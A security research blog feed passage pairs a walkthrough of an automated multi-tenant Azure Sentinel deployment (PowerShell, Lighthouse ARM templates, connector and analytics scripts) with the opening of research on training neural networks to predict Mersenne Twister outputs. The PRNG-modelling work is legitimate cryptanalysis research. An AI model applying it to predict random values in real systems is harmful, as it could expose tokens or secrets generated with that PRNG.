The branch can then be reviewed and merged. You could bypass this and check directly into the main branch if you want less manual intervention, but the manual review adds an extra layer of security to ensure no configs are accidentally / maliciously changed.

Creating Analytics

For analytics creation we have 2 options.

  1. Create Analytics in a Sentinel Test environment and export them to git. This will allow you to source control analytics as well as review any changes before allowing them into the main branch.
param(
[string]$resourceGroupName,
[string]$workspaceName,
[string]$outPath,
[string]$module='Scripts/Modules/Remove-InvalidFileNameChars.ps1'
)
import-module $module

Install-Module -Name Az.Accounts -AllowClobber -Force

Install-Module -Name Az.SecurityInsights -AllowClobber -Force

$results =Get-AzSentinelAlertRule -WorkspaceName $workspaceName -ResourceGroupName $resourceGroupName
$results
$myExtension = ".json"
$output = @()
foreach($temp in $results){
    
    if($temp.DisplayName)
    {
    $resultName = $temp.DisplayName
    if($temp.query)
    {
    if($temp.query.Contains($workspaceName))
    {
    $temp.query= $temp.query -replace $workspaceName , '{{targetWorkspace}}'
    $myExportPath = "$($outPath)\Alerts\$($temp.productFilter)\"
    if(-not (Test-Path -Path $myExportPath))
    {
    new-item -ItemType Directory -Force -Path $myExportPath
    }
    $rule = $temp | ConvertTo-Json
    $resultName = Remove-InvalidFileNameChars -Name $resultName
    $folder = "$($myExportPath)$($resultName)$($myExtension)"
    $properties= [pscustomobject]@{DisplayName=($temp.DisplayName);RuleName=$resultName;Category=($temp.productFilter);Path=$myExportPath}
    $output += $properties
    $rule | Out-File $folder -Force
    }
    }
    }
} 

Note the -replace $workspaceName , ‘{{targetWorkspace}}’. This replaces the actual workspace used in our test environments via workspace(‘testworkspaceName’)with workspace(‘{{targetWorkspace}}’) to allow us to then replace it with the actual “Sub tenants” workspace name when being deployed.

  1. Create your own analytics in a custom portal, for the Blazor Portal I found Microsoft.Azure.Kusto.Language very useful for validating the KQL queries.

The benefit of creating your own is the ability to enrich what goes into them.

You might, for example, want to add full MITRE details into the analytics to be able to easily generate a MITRE coverage report for the created analytics.

If you are this way inclined, when deploying the analytics, use a generic template from Sentinel and replace the required values before submitting it back to your target Sentinel.

{
    "AlertRuleTemplateName":  null,
    "DisplayName":  "{DisplayPrefix}{DisplayName}",
    "Description":  "{Description}",
    "Enabled":  true,
    "LastModifiedUtc":  "\/Date(1619707105808)\/",
    "Query":  "{query}"
    "QueryFrequency":  {
                           "Ticks":  9000000000,"Days":  0,
                           "Hours":  0, "Milliseconds":  0, Minutes":  15, "Seconds":  0,
                           "TotalDays":  0.010416666666666666, "TotalHours":  0.25,
                           "TotalMilliseconds":  900000,
                           "TotalMinutes":  15, "TotalSeconds":  900
                       },
    "QueryPeriod":  {
                        "Ticks":  9000000000,
                        "Days":  0, "Hours":  0, "Milliseconds":  0, "Minutes":  15,
                        "Seconds":  0,
                        "TotalDays":  0.010416666666666666,
                        "TotalHours":  0.25,
                        "TotalMilliseconds":  900000,
                        "TotalMinutes":  15,
                        "TotalSeconds":  900
                    },
    "Severity":  "{Severity}",
    "SuppressionDuration":  {
"Ticks":  180000000000, "Days":  0, "Hours":  5, "Milliseconds":  0, "Minutes":  0,"Seconds":  0,"TotalDays":  0.20833333333333331, "TotalHours":  5, "TotalMilliseconds":  18000000, "TotalMinutes":  300, "TotalSeconds":  18000
                            },
    "SuppressionEnabled":  false, "TriggerOperator":  0, "TriggerThreshold":  0,
    "Tactics":  [
                    "DefenseEvasion"
                ],
    "Id":  "{alertRuleID}",
    "Name":  "{alertRuleguid}",
    "Type":  "Microsoft.SecurityInsights/alertRules",
    "Kind":  "Scheduled"
}

Let’s Lighthouse this up!

Now we have the service connections and initial client config in place, we can start building the Onboarding pipeline for Tenant B.

As part of this we will cover:

  • Generate consistent naming conventions
  • Creating the Log Analytics workspace specified in config and enabling Sentinel
  • Setting up the Lighthouse connection to Tenant A
  • Enabling the required Connectors in Sentinel

Consistent naming (optional)

There are a lot of different ways for getting naming conventions done.

I quite like to push a few parameters into a PowerShell script, then write the naming conventions back to the pipeline, so the convention script can be used in multiple pipelines to provide consistency and easy maintainability.

The below script generates variables for a select number of resources, then pushes them out to the pipeline.

param(
[string]$location,[string]$environment,[string]$customerIdentifier,[string]$instance)
$location = $location.ToLower()
$environment = $environment.ToLower()
$customerIdentifier = $customerIdentifier.ToLower()
$instance = $instance.ToLower()
$conventions = New-Object -TypeName psobject 
$conventions | Add-Member -MemberType NoteProperty -Name CustomerResourceGroup -Value "rg-$($location)-$($environment)-$($customerIdentifier)$($instance)"
$conventions | Add-Member -MemberType NoteProperty -Name LogAnalyticsWorkspace -Value "la-$($location)-$($environment)-$($customerIdentifier)$($instance)"
$conventions | Add-Member -MemberType NoteProperty -Name CustLogicAppPrefix -Value "wf-$($location)-$($environment)-$($customerIdentifier)-"
$conventions | Add-Member -MemberType NoteProperty -Name CustFunctionAppPrefix -Value "fa-$($location)-$($environment)-$($customerIdentifier)-"
foreach($convention in $conventions.psobject.Properties | Select-Object -Property name, value)
{
Write-Host "##vso[task.setvariable variable=$($convention.name);isOutput=true]$($convention.Value)"
}

Sample use would be

  - task: [email protected]
    name: "naming"
    inputs:
      filePath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/GenerateNamingConvention.ps1'
      arguments: '-location "some Location" -environment "some environment" -customerIdentifier "some identifier" -instance "some instance"'

  - task: [email protected]
    displayName: 'Sample task using variables from naming task'
    inputs:
      azureSubscription: '$(ServiceConnection)'
      ScriptType: 'FilePath'
      ScriptPath: 'some script path'
      ScriptArguments: '-resourceGroup "$(naming.StorageResourceGroup )" -workspaceName "$(naming.LogAnalyticsWorkspace)"'
      azurePowerShellVersion: 'LatestVersion'
      pwsh: true

Configure Log analytics workspace in sub tenant / enable Sentinel

You could do the following using ARM, however, in the actual solution, I am doing a lot of additional taskswith the Workspace that were much easier to achieve in script (hence my choice to script it instead).

Create new workspace if it doesn’t exist:

param(
[string]$resourceGroupName,
[string]$workspaceName,
[string]$Location
[string]$sku
)
$rg = Get-AzResourceGroup -Name $resourceGroupName -ErrorAction SilentlyContinue
if(-not $rg)
{
New-AzResourceGroup -Name $resourceGroupName -Location $Location
}
$ws = Get-AzOperationalInsightsWorkspace -ResourceGroupName $resourceGroupName -Name $workspaceName -ErrorAction SilentlyContinue
if(-not $ws){
$ws = New-AzOperationalInsightsWorkspace -Location $Location -Name $workspaceName -Sku $sku -ResourceGroupName $resourceGroupName -RetentionInDays 90
}

Check if Sentinel is already enabled for the Workspace and enable it if not:

param(
[string]$resourceGroupName,
[string]$workspaceName
)
Install-Module AzSentinel -Scope CurrentUser -Force -AllowClobber
Import-Module AzSentinel

    $solutions = Get-AzOperationalInsightsIntelligencePack -resourcegroupname $resourceGroupName -WorkspaceName $workspaceName -ErrorAction SilentlyContinue

    if (($solutions | Where-Object Name -eq 'SecurityInsights').Enabled) {
        Write-Host "SecurityInsights solution is already enabled for workspace $($workspaceName)"
    }
    else {
        Set-AzSentinel -WorkspaceName $workspaceName -Confirm:$false
    }

Setting up Lighthouse to the Master tenant

param(
[string]$customerConfig='',
[string]$templateFile = '',
[string]$templateParameterFile='',
[string]$AadGroupID='',
[string]$tenantId=''
)
$config = Get-Content -Path $customerConfig |ConvertFrom-Json
$parameters = (Get-Content -Path $templateParameterFile -Raw) -replace '{principalId}' , $AadGroupID

Set-Content -Value $parameters -Path $templateParameterFile -Force
New-AzDeployment -Name "Lighthouse" -Location "$($config.Location)" -TemplateFile $templateFile -TemplateParameterFile $templateParameterFile -rgName "$($config.TargetResourceGroup)" -managedByTenantId "$tenantId" 

This script takes in the config file we generated earlier to read out client or  sub tenant values for location and the resource group in the sub tenant then sets up Lighthouse with the below ARM template / parameter file after replacing the ’principalID’ placeholder in the config with the Azure AD group ID we set up earlier.

Note that in the Lighthouse ARM template  and parameter file, we are keeping the permissions to an absolute minimum, so users in the Azure AD group in the master tenant will only be able to interact with the permissions granted using the role definition IDs specified.

If you are setting up Lighthouse for the management of additional parts of the Sub tenant you can add andchange the role definition IDs to suit your needs.

Lighthouse.parameters.json

{
  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "mspOfferName": {
      "value": "Enter Offering Name"
    },
    "mspOfferDescription": {
      "value": "Enter Description"
    },
    "managedByTenantId": {
      "value": "ID OF YOUR MASTER TENANT"
    },
    "authorizations": {
      "value": [
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "ab8e14d6-4a74-4a29-9ba8-549422addade",
          "principalIdDisplayName": " Sentinel Contributor"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "3e150937-b8fe-4cfb-8069-0eaf05ecd056",
          "principalIdDisplayName": " Sentinel Responder"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "8d289c81-5878-46d4-8554-54e1e3d8b5cb",
          "principalIdDisplayName": "Sentinel Reader"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "f4c81013-99ee-4d62-a7ee-b3f1f648599a",
          "principalIdDisplayName": "Sentinel Automation Contributor"
        }
      ]
    },
    "rgName": {
      "value": "RG-Sentinel"
    }
  }
}


Lighthouse.json

{
    "$schema": "https://schema.management.azure.com/schemas/2018-05-01/subscriptionDeploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "parameters": {
"mspOfferName": {"type": "string",},"mspOfferDescription": {"type": "string",}, "managedByTenantId": {"type": "string",},"authorizations": {"type": "array",}, "rgName": {"type": "string"}},
    "variables": {
        "mspRegistrationName": "[guid(parameters('mspOfferName'))]",
        "mspAssignmentName": "[guid(parameters('rgName'))]"},
    "resources": [{
            "type": "Microsoft.ManagedServices/registrationDefinitions",
            "apiVersion": "2019-06-01",
            "name": "[variables('mspRegistrationName')]",
            "properties": {
                "registrationDefinitionName": "[parameters('mspOfferName')]",
                "description": "[parameters('mspOfferDescription')]",
                "managedByTenantId": "[parameters('managedByTenantId')]",
                "authorizations": "[parameters('authorizations')]"
            }},
        {
            "type": "Microsoft.Resources/deployments",
            "apiVersion": "2018-05-01",
            "name": "rgAssignment",
            "resourceGroup": "[parameters('rgName')]",
            "dependsOn": [
                "[resourceId('Microsoft.ManagedServices/registrationDefinitions/', variables('mspRegistrationName'))]"],
            "properties":{
                "mode":"Incremental",
                "template":{
                    "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                    "contentVersion": "1.0.0.0",
                    "parameters": {},
                    "resources": [
                        {
                            "type": "Microsoft.ManagedServices/registrationAssignments",
                            "apiVersion": "2019-06-01",
                            "name": "[variables('mspAssignmentName')]",
                            "properties": {
                                "registrationDefinitionId": "[resourceId('Microsoft.ManagedServices/registrationDefinitions/', variables('mspRegistrationName'))]"
} } ]} } }],
    "outputs": {
        "mspOfferName": {
            "type": "string",
            "value": "[concat('Managed by', ' ', parameters('mspOfferName'))]"
        },
        "authorizations": {
            "type": "array",
            "value": "[parameters('authorizations')]"
        }}}

Enable Connectors

At the time of creating this solution, there were still a few connectors that could not be set via ARM and I imagine this will still be the case for new connectors as they get added to Sentinel, so I will provide the different ways of handling both deployment types and how to find out what body to include in the posts to the API.

For most connectors you can use existing solutions such as:

 Roberto Rodriquez’s Azure-Sentinel2Go 

Or

GitHub – javiersoriano/sentinel-all-in-one

First, we install the required modules and get the list of connectors to enable for our client / sub tenant, then, compare them to the list of connectors that are already enabled

param(
    [string]$templateLocation = '',
    [string]$customerConfig 
)
$config = Get-Content -Path $customerConfig |ConvertFrom-Json
$connectors=$config.connectors
$resourceGroupName = $config.TargetResourceGroup
$WorkspaceName = $config.TargetWorkspaceName
$templateLocation

Install-Module AzSentinel -Scope CurrentUser -Force

$connectorList = $connectors -split ','
$rg = Get-AzResourceGroup -Name $resourceGroupName
$check = Get-AzSentinelDataConnector -WorkspaceName $WorkspaceName | select-object -ExpandProperty kind
$outputArray = $connectorList | Where-Object {$_ -notin $check} 
$tenantId = (get-azcontext).Tenant.Id
$subscriptionId = (Get-AzSubscription).Id

$Resource = "https://management.azure.com/"

Next, we attempt to deploy the connectors using the ARM templates from one of the above solutions.

foreach($con in $outputArray)
{
    write-host "deploying $($con)"
    $out = $null 
   $out=  New-AzResourceGroupDeployment -resourceGroupName "$($resourceGroupName)" -TemplateFile $templateLocation -dataConnectorsKind "$($con)"-workspaceName "$($WorkspaceName)" -securityCollectionTier "ALL" -tenantId "$($tenantId)" -subscriptionId "$($subscriptionId)" -mcasDiscoveryLogs $true -Location $rg.Location -ErrorAction SilentlyContinue
   if($out.ProvisioningState -eq "Failed")
   {
       write-host '------------------------'
       write-host "Unable to deploy $($con)"
       $out | Format-Table
       write-host '------------------------'
       Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con) CorrelationId: $($out.CorrelationId)"
   }
   else{
       write-host "deployed $($con)"
   }

If the connector fails to deploy, we write a warning message to the pipeline.

This will work for most connectors and might be all you need for your requirements.

If there is a connector not currently available such as the Active Directory Diagnostics one was when I created this, we need to use a different approach. Thanks to Roberto Rodriguez for the suggestion.

  1. Using your favourite Browser, go to an existing Sentinel instance that allows you to enable the connector you need.
  2. Go through the steps of enabling the connector, then on the last step when submitting open the debug console (Dev tools) in your browser and on the Network tab look through the posts made.
  3. There should be one containing the payload for the connector you just enabled with the correct settings and URL to post to.
  4. Now we can replicate this payload in PowerShell and enable them automatically.

When enabling the connector, note the required permissions needed and ensure your ADO service connection meets the requirements!

Create the URI using the URL from the post message, replacing required values such as workspace name with the one used for your target environment

Example:

$uri = "/providers/microsoft.aadiam/diagnosticSettings/AzureSentinel_$($WorkspaceName)?api-version=2017-04-01"

Build up the JSON post message starting with static bits

           $payload =         '{
            "kind": "AzureActiveDirectoryDiagnostics",
            "properties": {
                "logs": [
                    {
                        "category": "SignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "AuditLogs",
                        "enabled": true
                    },
                    {
                        "category": "NonInteractiveUserSignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ServicePrincipalSignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ManagedIdentitySignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ProvisioningLogs",
                        "enabled": true
                    }
                ]
            }
        }'|ConvertFrom-Json

Add additional required properties that were not included in the static part:

        $connectorProperties =$ payload.properties
        $connectorProperties | Add-Member -NotePropertyName workspaceId -NotePropertyValue "/subscriptions/$($subscriptionId)/resourceGroups/$($resourceGroupName)/providers/Microsoft.OperationalInsights/workspaces/$($WorkspaceName)"

        $connectorBody = @{}

        $connectorBody | Add-Member -NotePropertyName name -NotePropertyValue "AzureSentinel_$($WorkspaceName)"
        $connectorBody.Add("properties",$connectorProperties)

And finally, try firing the request at Azure with a bit of error handling to write a warning to the pipeline if something goes wrong.

        try {
            $result = Invoke-AzRestMethod -Path $uri -Method PUT -Payload ($connectorBody | ConvertTo-Json -Depth 3)
            if ($result.StatusCode -eq 200) {
                Write-Host "Successfully enabled data connector: $($payload.kind)"
            }
            else {
                Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con)  with error: $($result.Content)" 
            }
        }
        catch {
            $errorReturn = $_
            Write-Verbose $_
            Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con)  with error: $errorReturn" 
        }

Phase 2: Deploy Sentinel analytics to Master tenant pointed at Sub tenant logs

If you followed all the above steps and onboarded a sub tenant and are in the Azure AD group, you should now be able to see the sub tenants Log analytics workspace in your Master Tenant Sentinel, at this stage you can also remove the service principle in the sub tenant.

If you cannot see it:

It sometimes takes 30+ minutes for Lighthouse connected tenants to show up in the master tenant.

Ensure you have the sub tenant selected in “Directories + Subscriptions”

In Sentinel, make sure the subscription is selected in your filter

Deploying a new analytic

First load a template analytic.

If you just exported the analytics from an existing Sentinel instance you just need to make sure you set the workspace inside of the query to the correct one.

$alert = (Get-Content -Path $file.FullName) |ConvertFrom-Json  
$analyticsTemplate =$ alert.detection_query  -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName) 

In my case, I am loading a custom analytics file, so need to combine it with my template file so need to set a few more bits.

  $alert = (Get-Content -Path $file.FullName) |ConvertFrom-Json 
      $workspaceName = '$(naming.LogAnalyticsWorkspace)'
      $resourceGroupName= '$(naming.CustomerResourceGroup)'
      $id = New-Guid
      $analyticsTemplate = (Get-Content -Path $detectionPath )  -replace '{DisplayPrefix}' , 'Sentinel-' -replace '{DisplayName}' , $alert.display_name   -replace '{DetectionName}' , $alert.detection_name  -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName) |ConvertFrom-Json 
      
      $QueryPeriod =([timespan]$alert.Interval)
      $lookbackPeriod = ([timespan]$alert.LookupPeriod)
      $SuppressionDuration = ([timespan]$alert.LookupPeriod)
      
      $alert.detection_query=$alert.detection_query  -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName)
      $alert.detection_query
      $tempDescription = $alert.description
      $analyticsTemplate.Severity = $alert.severity 

Create the analytic in Sentinel

When creating the analytics, you can either

  1. put them directly into the Analytics workspace that is now visible in the Master tenant through Lighthouse
  2. create a new workspace, and point the analytics at the other workspace by adding workspace(targetworkspace) to all tables in your analytics for example workspace(targetworkspace).DeviceEvents.

The latter solution keeps all the analytics in the Master tenant, so all queries can be stored there and do not go into the sub tenant (can be useful for protecting intellectual property or just having all analytics in one single workspace pointing at all the others).

At the time of creating the automated solution for this, I had a few issues with the various ways of deploying analytics, which have hopefully been solved by now. Below is my workaround that is still fully functional.

  • The Az.SecurityInsights version of New-AzSentinelAlertRule did not allow me to set tactics on the analytic.
  • The azsentinel version did have a working way to add tactics, but failed to create the analytic properly
  • neither of them worked with adding entities.

So in a rather unpleasant solution I:

  1. Create the initial analytic using Az.SecurityInsights\New-AzSentinelAlertRule
    1. Add the tactic in using azsentinel\New-AzSentinelAlertRule
    1. Add the entities and final settings in using the API
  Az.SecurityInsights\New-AzSentinelAlertRule -WorkspaceName $workspaceName -QueryPeriod $lookbackPeriod -Query $analyticsTemplate.detection_query -QueryFrequency $QueryPeriod -ResourceGroupName $resourceGroupName -AlertRuleId $id -Scheduled -Enabled  -DisplayName $analyticsTemplate.DisplayName -Description $tempDescription -SuppressionDuration $SuppressionDuration -Severity $analyticsTemplate.Severity -TriggerOperator $analyticsTemplate.TriggerOperator -TriggerThreshold $analyticsTemplate.TriggerThreshold 
       $newAlert =azsentinel\Get-AzSentinelAlertRule -WorkspaceName $workspaceName  | where-object {$_.name -eq $id}
       $newAlert.Query =  $alert.detection_query
      $newAlert.enabled = $analyticsTemplate.Enabled
       azsentinel\New-AzSentinelAlertRule -WorkspaceName $workspaceName -Kind $newAlert.kind -SuppressionEnabled $newAlert.suppressionEnabled -Query $newAlert.query -DisplayName $newAlert.displayName -Description $newAlert.description -Tactics $newAlert.tactics -QueryFrequency $newAlert.queryFrequency -Severity $newAlert.severity -Enabled $newAlert.enabled -QueryPeriod $newAlert.queryPeriod -TriggerOperator $newAlert.triggerOperator -TriggerThreshold $newAlert.triggerThreshold -SuppressionDuration $newAlert.suppressionDuration 
      
      $additionUri = $newAlert.id + '?api-version=2021-03-01-preview'
      $additionUri
      $result = Invoke-AzRestMethod -Path $additionUri -Method Get
      $entityCont ='[]'| ConvertFrom-Json
        $entities = $alert.analyticsEntities.entityMappings | convertto-json -Depth 4
        $content  = $result.Content | ConvertFrom-Json
        $tactics= $alert.tactic.Split(',') | ConvertTo-Json
      $aggregation = 'SingleAlert'
      if($alert.Grouping)
      {
      if($alert.Grouping -eq 'AlertPerResult')
      {
        $aggregation = 'AlertPerResult'
      }}

      $body = '{"id":"'+$content.id+'","name":"'+$content.name+'","type":"Microsoft.SecurityInsights/alertRules","kind":"Scheduled","properties":{"displayName":"'+$content.properties.displayName+'","description":"'+$content.properties.description+'","severity":"'+$content.properties.severity+'","enabled":true,"query":'+($content.properties.query |ConvertTo-Json)+',"queryFrequency":"'+$content.properties.queryFrequency+'","queryPeriod":"'+$content.properties.queryPeriod+'","triggerOperator":"'+$content.properties.triggerOperator+'","triggerThreshold":'+$content.properties.triggerThreshold+',"suppressionDuration":"'+$content.properties.suppressionDuration+'","suppressionEnabled":false,"tactics":'+$tactics+',"alertRuleTemplateName":null,"incidentConfiguration":{"createIncident":true,"groupingConfiguration":{"enabled":false,"reopenClosedIncident":false,"lookbackDuration":"PT5H","matchingMethod":"AllEntities","groupByEntities":[],"groupByAlertDetails":[],"groupByCustomDetails":[]}},"eventGroupingSettings":{"aggregationKind":"'+$aggregation+'"},"alertDetailsOverride":null,"customDetails":null,"entityMappings":'+ $entities +'}}'
     
 $res = Invoke-AzRestMethod -path $additionUri -Method Put -Payload $body 

You should now have all the components needed to create your own multi-Tenant enterprise scale pipelines.

The value from this solution comes from:

  1. Being able to quickly push custom made analytics to a multitude of workspaces
  2. Being able to source control analytics and code review them before deploying
  3. Having the ability to manage all sub tenants from the same master tenant without having to create accounts in each tenant
  4. Consistent RBAC for all tenants
  5. A huge amount of room to extend on this solution.


As mentioned at the start, this blog post only covers a small part of the overall deployment strategy we have at NCC Group, to illustrate the overall deployment workflow we’ve taken for Azure Sentinel. Upon this foundation, we’ve built a substantial ecosystem of custom analytics to support advanced detection and response.

✇ NCC Group Research

Cracking Random Number Generators using Machine Learning – Part 2: Mersenne Twister

By: Mostafa Hassan

Outline

1. Introduction

In part 1 of this post, we showed how to train a Neural Network to generate the exact sequence of a relatively simple pseudo-random number generator (PRNG), namely xorshift128. In that PRNG, each number is totally dependent on the last four generated numbers (which form the random number internal state). Although ML had learned the hidden internal structure of the xorshift128 PRNG, it is a very simple PRNG that we used as a proof of concept.

The same concept applies to a more complex structured PRNG, namely Mersenne Twister (MT). MT is by far the most widely used general-purpose (but still: not cryptographically secure) PRNG [1].  It can have a very long period of 32bit words with a statistically uniform distribution. There are many variants of the MT PRNG that follows the same algorithm but differ in the constants and configurations of the algorithm. The most commonly used variant of MT is MT19937. Hence, for the rest of this article, we will focus more on this variant of MT.

To crack the MT algorithm, we need first to examine how it works. In the next section, we will discuss how MT works.

** Editor’s Note: How does this relate to security? While both the research in this blog post (and that of Part 1 in this series) looks at a non-cryptographic PRNG, we are interested, generically, in understanding how machine learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use machine learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space, extending the approach used for xorshift128 to Mersenne Twister, a non-cryptographic PRNG sometimes mistakenly used where a cryptographically-secure PRNG is required. **

2. How does MT19937 PRNG work?

MT can be considered as a twisted form of the generalized Linear-feedback shift register (LFSR). The idea of LFSR is to use a linear function, such as XOR, with the old register value to get the register’s new value. In MT, the internal state is saved in the form of a sequence of 32-bit words. The size of the internal state is different based on the MT variant, which in the case of  MT19937 is 624. The pseudocode of MT is listed below as shared in Wikipedia.

 // Create a length n array to store the state of the generator
 int[0..n-1] MT
 int index := n+1
 const int lower_mask = (1 << r) - 1 // That is, the binary number of r 1's
 const int upper_mask = lowest w bits of (not lower_mask)
 
 // Initialize the generator from a seed
 function seed_mt(int seed) {
     index := n
     MT[0] := seed
     for i from 1 to (n - 1) { // loop over each element
         MT[i] := lowest w bits of (f * (MT[i-1] xor (MT[i-1] >> (w-2))) + i)
     }
 }
 
 // Extract a tempered value based on MT[index]
 // calling twist() every n numbers
 function extract_number() {
     if index >= n {
         if index > n {
           error "Generator was never seeded"
           // Alternatively, seed with constant value; 5489 is used in reference C code[53]
         }
         twist()
     }
 
     int y := MT[index]
     y := y xor ((y >> u) and d)
     y := y xor ((y << s) and b)
     y := y xor ((y << t) and c)
     y := y xor (y >> l)
 
     index := index + 1
     return lowest w bits of (y)
 }
 
 // Generate the next n values from the series x_i 
 function twist() {
     for i from 0 to (n-1) {
         int x := (MT[i] and upper_mask)
                   + (MT[(i+1) mod n] and lower_mask)
         int xA := x >> 1
         if (x mod 2) != 0 { // lowest bit of x is 1
             xA := xA xor a
         }
         MT[i] := MT[(i + m) mod n] xor xA
     }
     index := 0
 } 

The first function is seed_mt, used to initialize the 624 state values using the initial seed and the linear XOR function. This function is straightforward, but we will not get in-depth of its implementation as it is irrelevant to our goal. The main two functions we have are extract_number and twist. extract_number function is called every time we want to generate a new random value.  It starts by checking if the state is not initialized; it either initializes it by calling seed_mt with a constant seed or returns an error. Then the first step is to call the twist function to twist the internal state, as we will describe later. This twist is also called every 624 calls to the extract_number function again. After that, the code uses the number at the current index (which starts with 0 up to 623) to temper one word from the state at that index using some linear XOR, SHIFT, and AND operations. At the end of the function, we increment the index and return the tempered state value. 

The twist function changes the internal states to a new state at the beginning and after every 624 numbers generated. As we can see from the code, the function uses the values at indices i, i+1, and i+m to generate the new value at index i using some XOR, SHIFT, and AND operations similar to the tempering function above.

Please note that w, n, m, r, a, u, d, s, b, t, c, l, and f are predefined constants for the algorithm that may change from one version to another. The values of these constants for MT19937 are as follows:

  • (wnmr) = (32, 624, 397, 31)
  • a = 9908B0DF16
  • (ud) = (11, FFFFFFFF16)
  • (sb) = (7, 9D2C568016)
  • (tc) = (15, EFC6000016)
  • l = 18
  • f = 1812433253

3. Using Neural Networks to model the MT19937 PRNG

As we saw in the previous section, MT can be split into two main steps, twisting and tempering steps. The twisting step only happens once every n calls to the PRNG (where n equals 624 in MT19937) to twist the old state into a new state. The tempering step happens with each number generated to convert one of the 624 states to a random number. Hence, we are planning to use two NN models to learn each step separately. Then we will use the two models to reverse the whole PRNG by using the reverse tempering model to get from a generated number to its internal state then use the twisting model to produce the new state. Then, we can temper the generated state to get to the expected new PRNG number.

3.1 Using NN for State Twisting

After checking the code listing for the twisting function line 46, we can see that the new state at the position, i, depends on the variable xA and the value of the old state value at position (i + m), where m equals 397 in MT19937. Also, the value of xA depends on the value of the variable x and some constant a. And the value of the variable x depends on the old state’s values at positions i and i + 1.

Hence, we can deduce that, and without getting into the details, each new twisted state depends on three old states as follows:

MT[i] = f(MT[i - 624], MT[i - 624 + 1], MT[i - 624 + m])

    = f(MT[i - 624], MT[i - 623], MT[i - 227])     ( using m = 397 as in MT19937 )

We want to train an NN model to learn the function f hence effectively replicating the twisting step. To accomplish this, we have created a different function that generates the internal state (without tempering) instead of the random number. This allows us to correlate the internal states with each other, as described in the above formula.

3.1.1 Data Preparation

We have generated a sequence of 5,000,000 32bits words of states. We then formatted these states into three 32bits inputs and one 32bits output. This would create around a five million records dataset (5 million – 624). Then we split the data into training and testing sets, with only 100,000 records for the test set, and the rest of the data is used for training.

3.1.2 Neural Network Model Design

Our proposed model would have 96 inputs in the input layer to represent the old three states at the specific locations described in the previous equation, 32-bit each, and 32 outputs in the output layer to represent the new 32-bit state. The main hyperparameters that we need to decide are the number of neurons/nodes and hidden layers. We have tested different models’ structures with different hidden layers and a different number of neurons in each layer. Then we used Keras’ BayesianOptimization to select the optimal number of hidden layers/neurons along with other optimization parameters (such as learning rate, … etc.). We used a small subset of the training set as the training set for this optimization. We have got multiple promising model structures. Then, we used the smallest model structure that had the most promising result.  

3.1.3 Optimizing the NN Inputs

After training multiple models, we noticed that the weights that connect the first 31-bit of the  96 input bits to the first hidden layer nodes are almost always close to zero. This implies that those bits have no effects on the output bits, and hence we can ignore them in our training. To check our observation with the MT implementation, we noticed that the state at position i is bitwise ANDed with a bitmask called upper_mask which, when we checked, has a value of 1 in the MSB and 0 for the rest when using r with the value of 31 as stated in MT19937. So, we only need the MSB of the state at position i. Hence, we can train our NN with only 65bits inputs instead of 96.

Hence, our neural network structure ended up with the following model structure (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 96)                6336      
_________________________________________________________________
dense_1 (Dense)              (None, 32)                3104      
=================================================================
Total params: 9,440
Trainable params: 9,440
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of the parameters (weights and biases) of the hidden layer is only 6,336 (65×96 weights + 96 biases), and the number of the parameters of the output layer is 3,104 (96×32 weights + 32 biases), which gets to a total of 9,440 parameters to train. The hidden layer activation function is relu, while the output layer activation function is sigmoid as we expect it to be a binary output. Here is the summary of the model parameters:

Twisting Model
Model Type Dense Network
#Layers 2
#Neurons 128 Dense
#Trainable Parameters 9,440
Activation Functions Hidden Layer: relu
Output Layer: sigmoid
Loss Function binary_crossentropy

3.1.4 Model Results

After a few hours and manual tweaking of the model architecture, we have trained a model that has achieved 100% bitwise accuracy for both the training and testing sets. To be more confident about what we have achieved, we have generated a new sample of 1000,000 states generated using a different seed than the one used to generate the previous data. We got the same result of 100% bitwise accuracy when we tested with the newly generated data.

This means that the model has learned the exact formula that relates each state to the three previous states. Hence if we got access to the three internal states at those specific locations, we could predict the next state. But, usually, we can get access only to the old random numbers, not the internal states. So, we need a different model that can reverse the generated tempered number to its equivalent internal state. Then we can use this model to create the new state. Then, we can use the normal tempering step to get to the new output. But before we get to that, let’s do model deep dive.

3.1.5 Model Deep Dive

This section will deep dive into the model to understand more what it has learned from the State relations data and if it matches our expectations. 

3.1.5.1 Model First Layer Connections

As discussed in Section 2, each state depends on three previous states, and we also showed that we only need the MSB (most significant bit) of the first state; hence we had 65bits as input. Now, we would like to examine whether all 65 input bits have the same effects on the 64 output bits? In other words, do all the input bits have more or less the same importance for the outputs? We can use the NN weights that connect the 65 inputs in the input layer to the hidden layer, the 96 hidden nodes, of our trained model to determine the importance of each bit. The following figure shows the weights connecting each input, in x-axes, to the 96 hidden nodes in the hidden layer:

We can notice that the second bit, which corresponds to the second state LSB, is connected to many hidden layer nodes, implying that it affects multiple bits in the output. Comparing this observation against the code listed in Section 2 corresponds to the if-condition that checks the LSB bit, and based on its value, it may XOR the new state with a constant value that dramatically affects the new state.

We can also notice that the 33rd input, marked on the figure, is almost not connected to any hidden layer nodes as all the weights are close to zero. This can also be mapped to the code in line 12, where we bit masked the second state to  0x7FFFFFFF in MT19937, which basically neglects the MSB altogether.

